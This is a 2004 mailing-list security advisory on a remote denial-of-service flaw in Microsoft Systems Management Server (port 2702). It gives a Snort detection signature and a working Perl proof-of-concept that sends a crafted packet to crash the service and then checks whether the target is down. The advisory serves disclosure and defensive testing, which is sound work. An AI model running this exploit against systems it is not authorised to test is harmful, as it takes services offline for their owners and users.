<<< Date Index >>>     <<< Thread Index >>>

MS SMS DOS Proof-of-concept code and Snort sig





#####################################################################

Advisory Name : Microsoft Systems Management Server Remote Denial Of Service 
Vulnerability
Release Date : 22 July, 2004
Application : Microsoft Systems Management Server (SMS)
Author : MacDefender / SRR Project Group of Ready Response 
(srr@xxxxxxxxxxxxxxxxx)

#####################################################################

Overview

In response to a remote denial of service vulnerability in the Microsoft 
Systems Management Server:

http://www.securityfocus.com/bid/10726
http://www.net-security.org/vuln.php?id=3576

We have developed a snort signature to detect attempted DOS attacks to the SMS 
port 2702 port on a server.

In addition we have also released perl code that will demonstrate the 
vulnerability against a live server, so administrators will be able to test the 
security of their own Systems Management Server's.


------------------------------------------------

Signature

The snort (www.snort.org) signature we have developed for identifying an 
attempted DOS attack to a Systems Management Server is as follows:

alert tcp any 1024: -> any 2702 (msg: "MS SMS DOS"; content: "|52 43 48 
30|";depth: 4;isdataat: 139; classtype: denial-of-service;)


------------------------------------------------

Proof of concept code

You may test your own Systems Management Server's for vulnerability to this 
issue by using the following perl code:


#!/usr/bin/perl

#############################
#
# SMS DOS proof of concept and test code
#
#############################

use Socket;
use IO::Socket;

if (@ARGV != 1)
{
        print "usage: $0 <host or ip>\n";
        exit;
}

$host = shift(@ARGV);

$hexmsg = 
converthex("5243483016004000524348455858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858");

print "\nCreating socket for connection to: $host\n\n";

my $sock1 = IO::Socket::INET->new (PeerAddr => $host, PeerPort => "(2702)", 
Proto => "tcp") or die("Could not create socket: $!\n");

$sock1->autoflush(1);

print $sock1 "$hexmsg";

while (<$sock1>)
{
        print;
}

print "\nPacket sent to $host (please wait) ...\n";

sleep(2);

print "Verifying status of $host ...\n";

sleep(2);

my $sock2 = IO::Socket::INET->new (PeerAddr => $host, PeerPort => '(2702)', 
Proto => 'tcp') or die("\nDOS was successful - $host is down ...\n");

print "\nAttempt was not successful. $host is still alive and responding ...\n";

close($sock1);
close($sock2);

#############################
# End main code, start subs
#############################

sub converthex
{
        local ($l) = @_;
        $l =~ s/([0-9a-f]{1,2})\s*/sprintf("%c",hex($1))/egi;

        return $l;
}

#############################
# End code
#############################


------------------------------------------------

Credit

Credit for the development of the snort signature and proof of concept code is 
credited to MacDefender / SRR project group of Ready Response 
(http://www.readyresponse.org / srr@xxxxxxxxxxxxxxxxx)